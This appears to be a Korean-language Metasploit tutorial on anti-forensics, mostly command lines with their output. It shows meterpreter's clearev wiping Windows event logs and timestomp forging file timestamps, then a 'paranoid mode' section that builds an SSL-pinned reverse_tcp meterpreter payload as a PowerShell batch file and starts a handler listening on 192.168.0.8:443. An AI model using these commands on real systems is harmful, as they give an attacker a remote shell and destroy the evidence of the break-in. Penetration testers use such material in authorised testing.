[MAD-METASPLOIT] 0x40 - Anti Forensic

Remove event log
meterpreter > clearev
[*] Wiping 766 records from Application...
[*] Wiping 1375 records from System...
[*] Wiping 346 records from Security...

Timestomp

meterpreter > timestomp

Usage: timestomp OPTIONS file_path

OPTIONS:

-a <opt> Set the "last accessed" time of the file
-b Set the MACE timestamps so that EnCase shows blanks
-c <opt> Set the "creation" time of the file
-e <opt> Set the "mft entry modified" time of the file
-f <opt> Set the MACE of attributes equal to the supplied file
-h Help banner
-m <opt> Set the "last written" time of the file
-r Set the MACE timestamps recursively on a directory
-v Display the UTC MACE values of the file
-z <opt> Set all four attributes (MACE) of the file

meterpreter > ls
Listing: C:\Users\Public
========================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 4096 dir 2017-08-07 14:20:54 +0900 Desktop
40555/r-xr-xr-x 4096 dir 2015-09-17 14:10:20 +0900 Documents
40555/r-xr-xr-x 0 dir 2009-07-14 13:41:57 +0900 Downloads
40555/r-xr-xr-x 0 dir 2009-07-14 11:04:25 +0900 Favorites
40777/rwxrwxrwx 0 dir 2015-11-23 19:00:27 +0900 Juniper Networks
40555/r-xr-xr-x 4096 dir 2015-09-17 12:14:24 +0900 Libraries
40555/r-xr-xr-x 0 dir 2009-07-14 13:41:57 +0900 Music
40555/r-xr-xr-x 0 dir 2009-07-14 13:41:57 +0900 Pictures
40555/r-xr-xr-x 0 dir 2011-04-13 06:00:52 +0900 Recorded TV
40555/r-xr-xr-x 0 dir 2009-07-14 13:41:57 +0900 Videos
100666/rw-rw-rw- 174 fil 2009-07-14 13:41:57 +0900 desktop.ini

meterpreter > timestomp desktop.ini -v
Modified : 2009-07-14 13:41:57 +0900
Accessed : 2009-07-14 13:41:57 +0900
Created : 2009-07-14 13:41:57 +0900
Entry Modified: 2015-09-17 12:14:23 +0900

Paranoid Meterpreter

#> openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=test" -keyout test.key -out
#> cat test.key test.crt > test.pem

#> hvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.8 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./test.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o launch-paranoid.bat

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Saved as: launch-paranoid.bat

우와 같이 명령을 주면 -o 으로 지정해준 .bat 파일이 떨어집니다. (windows target 기준)
#> ll
합계 24
drwxr-xr-x 2 hahwul hahwul 4096 7월 12 22:12 .
drwxr-xr-x 60 hahwul hahwul 4096 7월 12 22:12 ..
-rw-r--r-- 1 root root 6255 7월 12 22:12 launch-paranoid.bat
-rw-r--r-- 1 root root 5228 7월 12 22:06 test.pem

cat 으로 생성된 bat 파일을 보면 powsershell을 이용해서 암호화된 payload를 실행하는 것을 알 수 있습니다.

hahwul auxiliary(test) #> use exploit/multi/handler
hahwul exploit(handler) #> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
hahwul exploit(handler) #> set LHOST 192.168.0.8
LHOST => 192.168.0.8
hahwul exploit(handler) #> set LPORT 443
LPORT => 443
hahwul exploit(handler) #> set HandlerSSLCert ./test.pem
HandlerSSLCert => ./test.pem
hahwul exploit(handler) #> set IgnoreUnknownPayloads true
IgnoreUnknownPayloads => true
hahwul exploit(handler) #> set StagerVerifySSLCert true;
StagerVerifySSLCert => true;

hahwul exploit(handler) #> run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.0.8:443

자세한 내용은 아래 링크 참고
http://www.hahwul.com/2016/07/metasploit-meterpreter-paranoid-mode.html